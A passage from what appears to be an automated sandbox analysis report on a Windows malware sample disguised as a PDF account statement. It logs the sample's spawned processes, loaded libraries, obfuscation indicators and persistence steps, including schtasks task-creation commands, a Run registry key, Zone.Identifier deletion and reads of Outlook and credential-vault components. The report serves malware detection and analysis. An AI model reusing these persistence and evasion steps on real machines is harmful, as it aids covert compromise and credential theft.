                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 1816
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp44D2.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 1828
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp6598.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7400 -s 1788
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: Statement of Account PDF.bat.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Statement of Account PDF.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Statement of Account PDF.bat.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: System.Data.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Accessibility.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Microsoft.VisualBasic.pdbu source: WERFDF5.tmp.dmp.17.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Data.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Configuration.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: UbK.pdb source: Statement of Account PDF.bat.exe, gDdsxauPhk.exe.0.dr, BjTxJte.exe.8.dr, WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.pdbMZ source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: System.Core.pdbMZ@ source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: System.Xml.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Core.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Drawing.pdbt source: WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Windows.Forms.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Microsoft.VisualBasic.pdbMZ source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: Accessibility.pdbSystem.ni.dllSystem.Core.dll4 source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: mscorlib.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Drawing.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Data.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: UbK.pdbSHA256 source: Statement of Account PDF.bat.exe, gDdsxauPhk.exe.0.dr, BjTxJte.exe.8.dr
                      Source: Binary string: System.Core.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.pdb4 source: WERFDF5.tmp.dmp.17.dr
                      Source: Binary string: Accessibility.pdbMZ source: WERFDF5.tmp.dmp.17.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Data.pdb, source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr

                      Data Obfuscation

                      Source: 0.2.Statement of Account PDF.bat.exe.3949970.2.raw.unpack, V4uC3Iifq56IKQcfry.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.Statement of Account PDF.bat.exe.7600000.7.raw.unpack, V4uC3Iifq56IKQcfry.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, Dr83W1h4x8JWr6EBI0.cs .Net Code: O3Bxfh3Ehd System.Reflection.Assembly.Load(byte[])
                      Source: Statement of Account PDF.bat.exe Static PE information: 0x9CBFCD6A [Fri May 2 16:20:58 2053 UTC]
                      Source: Statement of Account PDF.bat.exe Static PE information: section name: .text entropy: 7.953860448849022
                      Source: gDdsxauPhk.exe.0.dr Static PE information: section name: .text entropy: 7.953860448849022
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack High entropy of concatenated method names
                      Source: 0.2.Statement of Account PDF.bat.exe.3949970.2.raw.unpack High entropy of concatenated method names
                      Source: 0.2.Statement of Account PDF.bat.exe.7600000.7.raw.unpack High entropy of concatenated method names
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe File created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe File created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp"
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BjTxJte

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe File opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe File opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
